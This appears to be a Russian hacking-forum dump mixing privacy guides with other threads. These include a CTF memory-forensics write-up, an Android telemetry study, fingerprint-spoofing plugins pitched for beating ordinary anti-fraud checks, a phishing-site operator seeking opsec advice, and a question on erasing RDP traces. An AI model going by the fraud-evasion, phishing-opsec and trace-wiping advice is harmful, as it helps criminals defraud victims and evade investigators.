Если использовать DNSCypt без VPN, провайдер по-прежнему будет видеть, что вы обращаетесь к серверу с таким-то IP, и если на сервере с одним IP-адресом хостится несколько сайтов, то определить, на какой именно вы зашли, у него получится с помощью анализа запросов (запись Server Name Indicator передаётся открытым текстом даже при использовании HTTPS).

Click to expand...

Spoiler: Настройка

Spoiler: Главное

Здесь вы должны выбрать и нажать на свою сетевую карту, что бы она стала зеленой, если этого не сделать то смысла устанавливать данную программу не имеет никакого смысла.
Если вы не отключали IPv6 то можете поставить соответствующую галочку.

Spoiler: Дополнительно

Spoiler: Ресольверы

Я выбрал для себя всего 2 сервера DoH по описанию без логов и фильтров. Вы можете поставить автоматически либо выбрать вручную.

Вроде с DNS закончили. Теперь можно начать с установки и настройки Mozilla firefox.

Настройка mozilla firefox.

https://www.mozilla.org/ru/firefox/new/
Листаем вниз и выбираем обычную версию БЕЗ сервисов yandex.
О настройке самого firefox можно говорить бесконечно много и долго, но это тема еще не на одну статью. Так, что пока, что заходим в настройки и выключаем некоторые параметры.
Настройка > Приватность и защита.

Spoiler: Защита

Уровень защиты = строгая. Там сразу написано что к чему.

Spoiler: Разрешения

Заходим в эти параметры и ставим запрет на использование. (Если вы общаетесь в какой ни будь чатрулетке или чатрубате то камеру и микрофон лучше не отключать)

Чуть не забыл о таких вещах как webrtc
Пишем в адресной строке
about:config
Далее в поиске вбиваем
media.peerconnection.enabled и ставим на ней false

Плагины
[HTTPS Everywhere](https://addons.mozilla.org/ru/firefox/addon/https- everywhere/) - Зашифруйте сеть! Автоматически переключайтесь на безопасный протокол HTTPS там, где это возможно.
Privacy Possum - блокирует общие коммерческие методы отслеживания.
Ghostery - Это мощное расширение для обеспечения конфиденциальности. Блокируйте рекламу, отключайте средства слежения и ускоряйте загрузку веб-сайтов.
uBlock - быстрый и эффективный блокировщик для браузеров.
NoScript - расширение Firefox, блокирующее исполнение JavaScript, апплетов Java, Flash и других потенциально опасных компонентов HTML-страниц

Используемые материалы:

habr.com

[ Â«DNS over HTTPSÂ» Ð¾ÑÐ¾ÑÐ¼Ð»ÐµÐ½ Ð² RFC 8484 â Ð½Ð¾ Ð½Ðµ Ð²ÑÐµ Ð¸Ð¼

Ð´Ð¾Ð²Ð¾Ð»ÑÐ½Ñ ](https://habr.com/ru/company/it-grad/blog/429768/)

![habr.com](/proxy.php?image=https%3A%2F%2Fassets.habr.com%2Fhabr- web%2Fimg%2Ffavicons%2Ffavicon-16.png&hash=92e2dae146214fab23606c51ef42d36d&return_error=1) habr.com

![glashkoff.com](/proxy.php?image=https%3A%2F%2Fglashkoff.com%2Fapp%2Fuploads%2F2018%2F04%2Fpovyishaem- bezopasnost-interneta-s-pomoshhyu-simple- dnscrypt-1s5zb.jpg&hash=cbc6bd665e6073cbb6f9556df8b40998&return_error=1)

[ Повышаем безопасность интернета с помощью Simple DNSCrypt

](https://glashkoff.com/simple-dnscrypt/)

Введение Расскажу о программе, которой пользуюсь уже много лет. Она немного улучшает сетевую безопасность, защищая от подмены сайтов при р�

glashkoff.com

Плагины/приложения для браузерного антидетекта

ID: 676533bbb4103b69df371d24
Thread ID: 28834
Created: 2019-04-16T14:20:35+0000
Last Post: 2019-09-26T19:43:03+0000
Author: tabac
Replies: 8 Views: 3K

Краткий обзор плагинов и приложений для браузеров, которые легко могут конкурировать с лучшими антидетектами. Мы не будем рассматривать плагины, которые просто блокируют те или иные технологии, мы рассмотрим плагины именно для подмены отпечатков и передаваемых данных.

Всего 5 небольших плагинов превратят ваш обычный браузер Firefox в полноценный аналог браузерного антидетекта. Нужно отметить, что создаваемые плагинами отпечатки являются фейковыми (как и в браузерных антидетектах), поэтому серьезную антифрод систему вы не обойдете, но для обычных этого вполне хватит.

1. CyDec Platform AntiFingerprint
Плагин для браузера Firefox, который позволяет подменять топовые отпечатки как по отдельности так и все вместе. Имеет приятный внешний вид и интуитивно понятное управление.
<https://addons.mozilla.org/en-US/firefox/addon/cydec-platform- antifingerprint/>

2. Spoof Timezone
Простой, но полезный плагин для подмены часового пояса в каждом отдельном профиле браузера.
https://addons.mozilla.org/ru/firefox/addon/spoof-timezone/

3. Trace
Плагин, превращающий ваш обычный браузер в практически полноценную антидетект систему. Удобный интуитивно понятный интерфейс.
https://addons.mozilla.org/ru/firefox/addon/absolutedouble-trace/

4. Change geolocation
Плагин для подмены геолокации. Ничего больше.
https://addons.mozilla.org/ru/firefox/addon/change-geolocation-locguard/

5. Language switch
Многие знают как важно контроллировать язык при эмуляции пользователя. Плагин Language switch позволит вам это сделать.
https://addons.mozilla.org/ru/firefox/addon/languageswitch/

Прячемся от AGPS

ID: 676533bbb4103b69df371d30
Thread ID: 30828
Created: 2019-08-03T19:07:52+0000
Last Post: 2019-09-13T18:04:59+0000
Author: 2c71e9
Replies: 8 Views: 3K

Короче недавно меня осенила клевая мысль, как спрятаться от A-GPS, но при этом полноценно пользоваться телефоном. Ведь ни для кого не секрет, что вас запросто могут пробить по базовым станциям.

[CLIKE]Берем покупаем простой телефон который умеет раздавать интернет, туда суем симку и раздаем инет по вафле. Далее натягиваем впн или orbot на свой гаджет, смотря что у вас айфон или андроидо подобное существо. Отключаем мобильную связь, и телефон в режим полета. Подключаемся к тому телефону. Но при этом в настройках симки, укажите что использовать звонки через wifi.

Вот собственно и все, у нас полноценный функционал со звонками, но при этом если вас будут пробивать по номеру, ни чего не найдут ^_^ всем добра[/CLIKE]

FaceApp или параноя слабонервного

ID: 676533bbb4103b69df371d37
Thread ID: 30511
Created: 2019-07-19T13:47:05+0000
Last Post: 2019-08-12T23:25:25+0000
Author: bembi
Replies: 11 Views: 3K

Думаю что все знают про такое приложение как FaceApp (те кто не в курсе, гугл даст море инфы). Недавно прочитал что приложение вроде сливает всю инфу органам. Данные по фоткам с привязкой к локации и другая инфа с телефона все уходит через приложуху. Так вот, сам пользовал эту приложение, а теперь очкую по поводу того какую инфу еще могло слить это приложение. Может кто тоже уже задавался этим вопросом и знает еще что-то и стоит ли вообще очковать?

Помощь в безопасности

ID: 676533bbb4103b69df371d43
Thread ID: 29778
Created: 2019-06-13T16:08:51+0000
Last Post: 2019-07-02T08:09:30+0000
Author: immprtalgang
Replies: 8 Views: 3K

Поднял фишинг сайт у себя на 8080 порте . Что посоветуете для безопасности , поднять свой впн на впс сервере ? или как лучше поступить ?

Анализ дампа памяти с помощью Volatility Framework

ID: 676533bbb4103b69df371d44
Thread ID: 30100
Created: 2019-07-01T13:12:02+0000
Last Post: 2019-07-01T13:12:02+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 3K

Анализ дампа памяти с помощью Volatility Framework
Решение задания Easy husky с ISITDTU CTF 2019 Quals

На прошлых выходных проходит ISITDTU CTF 2019 Quals. Задания были довольно сложные, выше среднего. Тем не менее что-то можно было решить. Разбор некоторых заданий выйдет на канале на текущей недели.

Задания всё ещё доступны - https://ctf.isitdtu.com/challenges

Ссылка на событие - https://ctftime.org/event/803

Задание.

Задание представляло собой анализ дампа памяти, снятого с компьютера. Типичное задание категории "Forensics" или компьютерная криминалистка.

По описанию задания нам говорится, что компьютер был захвачен кем-то но пользователь вовремя успел записать действия. Скачиваем файл.

Это rar-архив. Ожидаемо, учитывая, что дампы могут занимать очень много места. Разархивируем и посмотрим полученный файл.

Сигнатура не определилась, но по размеру это действительно дамп памяти. Используем volatility для определения с какой системы был снят дамп и для поиска необходимой информации.

Кратко о volatility.
По сути это целый фреймворк для проведения криминалистических экспертиз над образами памяти, снятыми с компьютеров. На канале уже были посты с использованием volatility, но давно, если вы полистаете то найдёте.

Подробнее можно почитать здесь - https://github.com/volatilityfoundation/volatility/wiki

Доступные команды указаны здесь - https://github.com/volatilityfoundation/volatility/wiki/Command-Reference

Обратно к заданию.
Попробуем определить операционную систему.

Обычно при решение подобного рода задач необходимо сразу смотреть список процессов, историю браузера и список файлов. Это первые вещи, на которые стоит обратить внимание. Для просмотра всего этого существуют специальные команды в volatility.

Code:Copy to clipboard

volatility imageinfo -f husky_memory.raw

Отлично, volatility верно определил дамп и показал, что он был снят c WinXP.

Теперь посмотрим какие процессы есть. По сути это те процессы, которые были запущены в момент снятия дампа.

Code:Copy to clipboard

volatility pslits -f husky_memory.raw

Глаз цепляется только за "CocCocCrashHand". Но если погуглить, то можно понять, что это какой-то редко вызываемый процесс и в целом не малварь.

Посмотрим историю браузера.

Code:Copy to clipboard

volatility iehistory -f husky_memory.raw

История браузера довольно большая и в её начале мы видим обращение к некоторому файлу который называется "flag.txt.txt", однако, не стоит обольщаться, там находится фейковый флаг (не знаю зачем он был добавлен, это бессмысленно). Анализируем дальше.

Вот это уже интереснее, некоторый файл "s3cr3t.txt" и архив flag.rar. Скорее всего архив зашифрован, а в текстовом файле содержится пароль.

Попробуем просканировать все файлы и поискать в этом списке необходимые нам файлы.

Code:Copy to clipboard

volatility filescan -f husky_memory.raw > filescan.txt

Вывод команды в консоль будет пустым, т.к. мы перенаправили вывод в файл.

Открываем файл и ищем архив.

Такой файл не находится, также как и "s3cr3t.txt". Здесь и заключается вся сложность задания. Необходимо найти папку с играми, в которой лежал наш архив.

Мы видим некоторый файл со странным именем, которое больше похоже на адрес. При этом файл находится именно в той папке, где должен быть rar-архив. Попробуем сдампить этот файл по адресу слева.

Code:Copy to clipboard

volatility dumpfiles -Q 0x0000000002c5dd18 -D . -f husky_memory.raw

Обращаем внимание на конец файла и видим, что это сигнатура архива, только задом на перёд. Разворачиваем файл и получаем готовый архив.

Но он требует пароль.

Вот здесь происходит магия
Файл s3cr3t.txt так и не удалось найти (если у вас получилось, то напишите в бота-ответчика, как вы это сделали). В качестве пароля было использовано название директории в которой лежал файл (да это не совсем очевидно и по сути угадывания, ну а что делать?). Паролем является строка "hu5ky_4nd_f0r3n51c". При её вводе архив расшифровывается и мы получаем флаг.

Задание решено. Оно было довольно интересным до момента угадывания пароля, хотя возможно файл с паролем можно было как-то найти.

Автор: Telegram-канал "Убежище Хакера"

Заметаем следы: как удалить историю RDP подключений?

ID: 676533bbb4103b69df371d45
Thread ID: 29958
Created: 2019-06-24T14:47:10+0000
Last Post: 2019-07-01T12:49:53+0000
Author: lossir
Replies: 1 Views: 3K

Как это делается в Винде? Настоящее удаление, а не просто из списка предидущих подключений в окошечке RDP.

Знаю, что чиститься реестр тут: HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client в Default и Server.

Не уверен, что "чистка" такого рода не оставляет следов. Ваше мнение.

Что и как сливает Android о пользователе

ID: 676533bbb4103b69df371d47
Thread ID: 30078
Created: 2019-06-29T21:43:01+0000
Last Post: 2019-06-29T21:43:01+0000
Author: tabac
Replies: 0 Views: 3K

Ни для кого не секрет, что наши с тобой телефоны знают о нас слишком много. Порой даже больше, чем мы сами. И пока твой гаджет с тобой, трудно найти хоть минутку, когда никакая информация о твоих действиях не попадет в сеть. Допустим, ты установил кастомную прошивку и не устанавливал GApps. Думаешь, твои данные в безопасности? Сейчас проверим!

Производители смартфонов хотят сделать свои гаджеты уникальными. Одни достигают этого за счет реализации запредельных конфигураций (привет, Nokia 9 с пятью камерами), а другие, не имеющие таких ресурсов, украшают ничем не примечательное железо фирменными прошивками. Иногда вся «уникальность» прошивки заключается в фирменном лаунчере и обоях, в других имеет место полная переработка Android.

Первый способ использовал ZTE, выпустив в свет недорогой Blade L4 с прошивкой от «Билайна» в качестве единственного варианта. Помимо кучи бесполезного софта от собственно «Билайна», в «подарок» шли GApps в полном наборе (само собой, без возможности удаления) и антивирус, который отказывался работать без симки «Билайна». Второй способ использует китайская компания Xiaomi, известная своей бюджетной линейкой Redmi и довольно интересной прошивкой MIUI, в которой от оригинального «Андроида» почти ничего не осталось. То же самое делает Meizu, выпускающая свои телефоны с прошивкой Flyme.

И если с телефонами самой Google все более-менее ясно — информацию о том, какие данные они собирают, компания публикует открыто и даже позволяет забрать дамп этих данных себе, — то что собирают о нас китайские смартфоны? А какую информацию о тебе сливает AOSP или тот же LineageOS, если из них выпилить (или просто не устанавливать) сервисы и приложения Google? Попробуем разобраться.

Подопытные прошивки
Для начала определимся с кандидатами на тестирование. У нас их будет четыре:

Pixel Experience — сборка AOSP с полным комплектом приложений и сервисов Google. Это кастом, но кастом, максимально приближенный к прошивке, которую Google устанавливает на свои «Пиксели». Для нас это будет своего рода образец, который показывает, что сливает в сеть сама Google;
LineageOS 16 — кастомная прошивка на базе AOSP без приложений и сервисов Google. На этой прошивке мы проверим утверждение, что, если ты хочешь, чтобы за тобой не следили, надо поставить кастом без GApps;
MIUI 10.2.3.0 Global Stable — прошивка от Xiaomi. По сути, это уже не совсем Android, а взрывная смесь из китайских сервисов, собственной системы контроля разрешений, Google Play и его компании и тонны не удаляемого штатными средствами софта, который, впрочем, по умолчанию почти никакой угрозы не несет;
Flyme 6.8.4.3R beta — прошивка Flyme от Meizu. К сожалению, официальная версия так и не вышла из состояния беты, но в неофициальной (пусть и более новой) сборке были выпилены все сервисы от Meizu, стало быть, и тестировать нам будет нечего. Так что придется довольствоваться этой версией.

Кто и что знает о нас
В главных ролях:

корпорация добра по имени Google;
Xiaomi / Meizu / другой вендор.

Из заявления об отсутствии конфиденциальности мы знаем, что Большой Брат Google собирает и хранит массу информации. Это:

твоя история поиска, и не только в фирменном поисковике, но и в YouTube, который, как ты знаешь, тоже принадлежит Google. По умолчанию сбор этой информации включен и никак не афишируется, но ты можешь отключить ее сбор на странице настроек аккаунта;
полная история твоего местоположения, добываемая со смартфона. За это отвечает неубиваемая служба GoogleLocationService, работающая даже в том случае, если GApps’ы установлены в варианте pico. Особенность ее состоит в том, что для определения местоположения используется не только GPS, но и сотовые вышки и сети Wi-Fi. Вся эта информация хранится локально, но при наличии подключения к интернету сливается на серверы Google;
информация о приложениях на твоем устройстве и об их версиях. Эти данные сливаются Play Market’ом и нужны, надеюсь, только для статистики. На основании этой статистики заполняется раздел «Вам может понравиться» в Play Market’е;
все твои контакты. За их сбор отвечает служба синхронизации, включенная по умолчанию;
записи всех голосовых запросов;
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F227595%2Fscr_google_no_privacy.png&hash=37fc979d17d23f0b974b2d5981eac000)
полная и развернутая статистика твоих действий с телефоном и поиском. Найти ее можно тут.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F227595%2Fscr_g_app_history.png&hash=e8aae74f72fa4a106334db93b009252d)

Как видно из скриншота, Google собирает даже конкретное время запуска приложения на конкретном устройстве. Как ты уже догадался, эта функция тоже включена по умолчанию.

![Ладно еще Linux, но Windows-то тут откуда?](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F227595%2Fscr_g_ads_prefs.png&hash=5bd4785a1c64a77efb2c3a12202268ca)
Ладно еще Linux, но Windows-то тут откуда?

Кроме того, для тебя создается специальный рекламный профиль. Посмотреть и изменить его можно по этой ссылке.

Впрочем, рассказывать, что именно собирает о нас с тобой Большой Брат, можно очень долго. Думаю, что и этого, весьма скудного набора будет достаточно, чтобы ты понял, чем пахнет такое положение вещей.

Перечень информации, которую собирает Xiaomi, также весьма обширен (оригинальная орфография сохранена):

Информация, которую вы предоставляете нам или отправить (включая контактные данные): мы можем собрать любую персональную информацию, которую вы предоставляете нам, например, ваше имя, номер мобильного телефона, адрес электронной почты, адрес доставки, Ми реквизитов (например, связанные с безопасностью информации, ФИО, дата рождения, пол), заказа, счета-фактуры, материалы или информацию, Вы можете синхронизировать через облачные Ми или другими приложениями (например, фотографии, списки контактов), информация в отношении создания учетной записи и участия в форуме MIUI на xiaomi или другой платформы, номера телефонов, которые вы вводите в «контакты» или отправить сообщение, обратную связь, и любую другую информацию, которую вы нам предоставляете.

Устройства или SIM-обзоры информация : информация, связанная с вашим устройством. Например, номер IMEI, imsi номер, MAC-адрес, на MIUI, версия андроид, номер детали и название модели, оператора сети.

Сведения о вас, которые могут быть назначены нами : мы можем собирать и использовать информацию, такую как Ми ID учетной записи.

Информацию о местоположении (только за конкретные услуги/функции): различную информацию о вашем местоположении. Например, код страны, код города, код мобильной сети, мобильные личности, долготы и широты, языковые настройки.

Журнал сведений : информацию, относящуюся к использованию некоторых функций, приложений и веб-сайтов. Например, cookie-файлы и другие анонимные технологий идентификатор, IP адреса, временную историю Сообщений, стандартные системные журналы.

Другая информация : экологические характеристики значение (ОКП) (т. е. значение, генерируемое Ми номер счета, телефона, ID устройства, подключен Wi-Fi Интернет ID и местоположение значения).

Мы также можем собирать другие виды информации, которые не связаны с физическим лицом и которое является анонимным. Например, модели устройства и версии системы количество пользователей Xiaomi в устройстве мобильного телефона могут быть получены при использовании определенной услуги. Подобные сведения собираются для того, чтобы улучшить услуги, которые мы предоставляем Вам. Тип и объем собранной информации будет зависеть от того, как вы используете, соглашение или участвовать в наших продуктах и/или услугах.

Click to expand...

Это цитата из [официальной политики конфиденциальности](http://xiaomi- com.com/politika-konfidencialnosti/) (для тех, кто не понял, я специально сделал [перевод на человеческий русский](https://github.com/HackcatDev/-/blob/master/mi-privacy-policy- normal.md)), которая, по сути, гарантирует нам полное ее отсутствие. В свете этого старая советская фраза «Нам нужен мир, и по возможности — весь» обретает чуть другую формулировку: «Нам нужны твои данные, и по возможности — все». Звучит печально? Что ж, готовься к худшему.

Тестовый стенд
Тестовый стенд будет не один, а сразу три:

ZTE Blade L4 2015 года выпуска;
Xiaomi Redmi Note 4X 2017 года выпуска;
Xiaomi Redmi 4X.

С инструментами тоже все просто: Fiddler, Wireshark и tcpdump. Fiddler с Wireshark’ом мы поставим на большую машину, а tcpdump — на телефон со свежеустановленной прошивкой. Алгоритм действий будет следующим:

Устанавливаем чистую прошивку (по возможности без GApps).
Без активации гуглоаккаунта устанавливаем tcpdump и (по возможности и необходимости) корневой сертификат Fiddler’а.
Подключаемся к Wi-Fi-сети, которая раздается с ноута (там сидят Wireshark и Fiddler).
Сидим в засаде полчаса.
Тыкаем менюшки, всячески симулируя действия пользователя, но ничего не меняем.
Отключаем все, что можем отключить без прав root, и еще раз проходим пункты 4–5.

Снифаем трафик с живой системы
Я поднял точку доступа с ноутбука с Ubuntu 18.04 на борту, настроил на ней шлюз и повесил Wireshark. Конечно же, толку от него мало, если трафик идет по HTTPS, но в большинстве случаев сам факт установления соединения на некоторый адрес уже достаточное доказательство. Дальнейшая настройка проста как два рубля: настраиваем hostapd на хостовой машине, вешаем Wireshark там же, на телефоне импортируем корневой сертификат Fiddler’а и настраиваем прокси. Всё!

LineageOS 16
LineageOS — прошивка, основанная на коде CyanogenMod, который в свое время был эталоном среди свободных прошивок. «Циан» породил множество форков, из которых LineageOS, наверное, самый известный.

Сразу после загрузки нам предлагают согласиться на отправку анонимной статистики. Однако даже после согласия прошивка молчит. Не появилась она и после получаса сидения в засаде. На подключение к Wi-Fi-сети прошивка среагировала лишь проверкой соединения и затихла.

Вывод: LineageOS если и передает что-то, то делает это не сразу.

MIUI
С самого начала прошивка вела себя неспокойно. Запросы лились рекой на следующие серверы:

connect.rom.miui.com;
android.clients.google.com;
www.gstatic.com;
mtalk.google.com;
data.mistat.intl.xiaomi.com;
storage.googleapis.com;
redirector.gvt1.com;
www.youtube.com;
dl.google.com;
api.sec.miui.com;
r8—sn-cxauxaxjvh-hn9e7.gvt1.com.

Первый HTTP-запрос был на connect.rom.miui.com/generate_204, нужный для проверки соединения. Замечу, что запросы туда идут почти каждые полторы-две минуты, несмотря на отсутствие обрывов и стабильно низкие пинги.

Как только соединение было проверено, телефон связался с адресом data.mistat.intl.xiaomi.com/mistats/v2 и передал ему почти 2 Кбайт данных. Судя по всему, это что-то вроде телеметрии.

![Капля из океана собираемых данных](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F227595%2Fscr_miui_stats_sent.png&hash=ede97f67a84728ca2d72cf66284167d5)
Капля из океана собираемых данных

Затем еще два увесистых пакета с данными улетели на другой хост этой подсети 161.117.71.187, но, к сожалению, они оказались закодированы. Оба эти адреса находятся в Сингапуре.

Следующий интересный запрос ушел на relocationapi.micloud.xiaomi.net/mic/relocation/v3/user/record. Он содержал название моей страны и подпись, назначаемую, как я увидел в дальнейшем, каждому пакету для защиты от подделки. Следующим запросом туда же улетел некий статус, а затем еще несколько пакетов данных.

Следующая дверь, куда телефон постучал, была по адресу api.device.xiaomi.net. Сам запрос оказался пустым, но содержал кукисы, в которых лежала вся информация о моем телефоне, в том числе и уникальный серийный номер. В ответ на него телефон получил некий serviceToken, который отныне светится во всех HTTP-запросах, и не только на этот адрес. Следом туда же ушел мой User ID и Device ID.

Дальше мы видим то, что я ожидал увидеть в самом начале: обращение к рекламной сети. И не какой-то, а своей. Адрес хоста — globalapi.ad.xiaomi.com. На сервер уходит версия рекламного SDK и наш User ID из прошлого запроса. В ответ мы получаем список ключевых слов, согласно которым отныне будет загружаться реклама, и время хранения этой информации в кеше (указан как TTL).

Из-за популярности устройств линеек Mi и особенно Redmi в Xiaomi стекается уйма информации. Для балансировки нагрузки компания развернула приличную по размерам сеть по всему миру. Мой телефон прикрепили к индийскому серверу, и отныне вся информация идет туда.

![Download Provider должен Download, а не Upload!](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F227595%2Fscr_dl_prov_data.png&hash=f32a74d6c620089d36d2240ffe978cd1)
Download Provider должен Download, а не Upload!

Часть информации ушла через Download Provider (com.android.providers.downloads), которому ни один здравомыслящий человек доступ в сеть не запретит. Кстати, те же фокусы (то есть такие же пакеты, только с другими значениями channel и package_name) проворачивает менеджер тем com.android.thememanager и календарь (com.android.calendar). В среднем такие запросы идут каждые 30–40 секунд на разные адреса и с разными значениями channel и package_name.

Но настоящее шпионство только начинается: в один прекрасный момент мы получаем от resolver.gslb.mi-idc.com не только наш внешний IP-адрес (хотя непонятно, зачем он нужен телефону), но и страну, город, название провайдера, наш реальный IP-адрес (если мы сидим за прозрачным прокси), домен, куда нужно сливать статистику (мне пришел s.mi1.cc), используемый TTL, некий tid и по два аварийных адреса для использования через Wi-Fi и мобильную сеть соответственно (обращений к ним я не зафиксировал, но, если основные серверы Xiaomi навернутся, возможно, что-то и найдется).

Я уже хотел было заканчивать обзор этой прошивки, но заметил во втором дампе запрос к gstatic.com/android/config_update/11052018-sms-metadata.txt, в ответ на который нам пришел текстовый файл со следующим содержимым:

Code:Copy to clipboard

SIGNATURE:uE3dCcZfnDvXnxsV+uHVOmnzZS03kIcda4t2tA4tKY0w6vvx5vngBO6GTb/8j5+3ZvjqBBkx5f8rsiopC/7QgBQhDBBQMJj9i0oWycA/PzRiPGGpXySdyNobw5GKb8KB2GjFW5VXgC1GMuRkWHeCfGGV9zlXbueQeIschm+gayIA18g9D7Gs9cVzbzWo7VSL3ppbiJHD9FIf7VWeJjh8MhdYruWnHducGiztDKtXPNnWjgNKIlWYu5w3TiK3AtFinLUNE2ht15Z+nvRwcGVEmzeY8JKjDK3nRyhYrSWY3uDe5J9hUF9ViXSIWkDS5QP9aEx8wLv0+6EFSibpyZUK9Q==
VERSION:19
REQUIRED_HASH:NONE

Это метаданные к коротким кодам SMS.

Это было все, что я накопал из незашифрованного трафика, но осталось еще много SSL- и TLS-трафика, с которым разобраться не получилось. Прошивка волшебным образом игнорировала выставленные настройки прокси, так что пришлось ограничиться исследованием того, что можно было достать «голыми руками».

Что до отключения этой грандиозной шпионской машины, то в ней встроено слишком много инструментов для сбора данных. Отключить все это штатными средствами не удастся, а удаление «приложений-стукачей» целиком превратит твой телефон в обычную звонилку, толку от которой никакого.

Pixel Experience

Pixel Experience is an AOSP/CAF based ROM, with Google apps included and all Pixel goodies.

Click to expand...

Эта цитата вполне точно передает сущность прошивки. По сути, Pixel Experience — не что иное, как AOSP с лаунчером из смартфона Pixel плюс все приложения из пакета GApps.

Уже спустя пять минут использования прошивка отправила в сеть 80 тысяч пакетов, и я понял, что на анализ всего этого у меня уйдет вечность. Я просто составлю список адресов, а ты решай сам, готов ли отправить неопределенное (а на самом деле вполне определенное — 62 Мбайт) количество своих данных в Google.

IP-АДРЕС| ХОСТНЕЙМ
---|---
172.217.16.36| www.google.com
216.58.209.3| connectivitycheck.gstatic.com
216.239.35.12| time.android.com
74.125.131.188| mtalk.google.com
108.177.126.95| ns1.google.com
74.125.143.94|
209.85.234.188|
108.177.119.147| ns1.google.com
108.177.126.139| ns1.google.com
108.177.126.94| ns1.google.com
108.177.126.97| ns1.google.com
108.177.127.95| ns1.google.com
172.217.218.104|
172.217.218.91|
172.217.218.94|
172.217.218.95|
173.194.69.100|
173.194.69.190|
173.194.79.94|
173.194.79.95|
209.85.234.188|
216.239.35.12| time4.google.com
216.58.209.3|
224.0.0.22| igmp.mcast.net
224.0.0.251| sns.dns.icann.org
23.222.51.182| a23-222-51-182.deploy.static.akamaitechnologies.com
74.125.128.188|
74.125.131.188|
74.125.143.94|
74.125.143.95|
86.57.206.210| 210-206-57-86.beltelecom.by
8.8.8.8| google-public-dns-a.google.com
99.86.4.37| server-99-86-4-37.fra6.r.cloudfront.net

Лично у меня самое большое удивление вызвало обращение к поддомену Белтелекома, к которому я прикреплен чуть менее чем никак. И еще интереснее, почему гугловская прошивка стучит на Cloudfront.

Возможно, тебя заинтересовало, почему я оставил пустые ячейки в таблице, хотя адреса все нормально резолвятся. Я сделал это специально: все они являются поддоменами 1e100.net, принадлежащими Google, и предназначены они только для сбора информации с обширного парка устройств под управлением Android. Пустыми я оставил эти ячейки, чтобы ты видел масштаб: 16 адресов *.1e100.net против 17 всех остальных. Да и нам сейчас не важно, к какому именно штату принадлежит этот адрес (все они имеют имена вида eg-in-f94.1e100.net, ec- in-f188.1e100.net), важен сам факт соединения с этими адресами и передачи данных. Забегая вперед, скажу, что ни одна прошивка из протестированных сегодня не стала использовать выставленные настройки прокси. Вместо этого браузеры послушно ходили через прокси, а все остальное так и шло безо всякого досмотра содержимого пакетов.

HTTP-запросов было всего семь. Из них три вернули код 204 (No Content), остальные четыре скачали черные списки номеров, с которых рассылается спам. Видимо, особо известные спамеры отфильтровываются уже на уровне прошивки.

Итого из 33 хостов, куда ходил телефон без моего ведома, 28 принадлежат Google, один — Amazon, а остальные — кому придется. То есть абсолютное большинство данных берет себе Google.

После всех этих интересностей я взялся тыкать разные приложения. Почти ни на какие новые для нас узлы трафик не шел (кроме 108.177.127.84). А список старых сократился почти в шесть раз: все еще держалось соединение с 108.177.119.95, 108.177.126.147, 108.177.127.95, 173.194.69.100 и 173.194.79.95. В целом ничего странного.

После отключения всего софта производства Google, кроме лаунчера (за неимением альтернативы), результат налицо: единственное соединение осталось с 108.177.127.95. Это сервер DNS-over-TCP.

Вывод: за что боролись, на то и напоролись. Предустановленные сервисы и приложения Google повели себя ровно так, как описано в пользовательском соглашении, — сливали статистику, обновляли данные и выполняли синхронизацию. К сожалению (или счастью), при отключении или удалении сервисов Google мы получаем обычный AOSP.

Flyme
Думаю, каждый читатель слышал про эту прошивку. Многие знают о плавности ее работы, приятном интерфейсе и, конечно же, о большой ~~и вонючей~~ куче неудаляемых китайских сервисов. Еще на стадии первого запуска прошивка просит нас принять обширное пользовательское соглашение. Я постарался прочитать всего этого литературного монстра (которого, кстати, я нашел читабельным только на английском), чтобы ты, дорогой читатель, не занимался тратой своего времени. Вкусности начинаются со второй трети текста.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F227595%2Fscr_fmp0.jpeg&hash=33e869710b6e5e23da5d2145e5d1abd3)
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F227595%2Fscr_fmp1.jpeg&hash=0c36fa654251437535ddef6f4a8197ab)
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F227595%2Fscr_fmp2.jpeg&hash=6ef295eeb6693efeaaaec8fc31957c42)

После установки прошивки и соглашения с этим монструозным списком требований отдать неизвестно куда все свои данные кажется, что хуже уже быть не может. Но нет! Спустя полчаса сидения за окошком сниффера мы переходим ко второй части, когда начинаем тыкать приложения. Весь предустановленный софт за исключением диктофона потребовал разрешить пользоваться интернетом под разными предлогами, а половина из них еще и просила доступ к контактам. Даже клавиатура отказалась работать без выдачи этих разрешений. Для нее пришлось сделать исключение, так как без статического адреса мы не смогли бы исследовать трафик по причине его отсутствия.

![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp- content%2Fuploads%2F2019%2F06%2F227595%2Fscr_kb_perm.jpg&hash=e573150e34742b2ce884642b5019f128)

Прошивка сделала DNS-запросы к следующим хостам:

connect.rom.miui.com;
ni.qingmang.mobi;
api-baas.flyme.cn;
uxip-res.meizu.com;
umap.meizu.com;
u.meizu.com;
servicecut.meizu.com;
input.shouji.sogou.com;
uc-res.mzres.com;
api-push.meizu.com;
findphone.meizu.com;
upush.meizu.com;
safe.res.meizu.com;
safe.meizu.com;
apilocate.amap.com;
uxip-config.meizu.com;
safe.mzres.com;
pmir.3g.qq.com;
www.baidu.com;
umid.orion.meizu.com;
p.meizu.com;
apiinit.amap.com;
scan.call.f.360.cn;
uxip.meizu.com;
mazu.3g.qq.com;
restapi.amap.com;
p-ns.meizu.com;
map-api.cn-hangzhou.oss-pub.aliyun-inc.com;
hades.meizu.com;
stats.lineageos.org;
aider.meizu.com;
roam.meizu.com;
aider-res.meizu.com;
g.meizu.com.

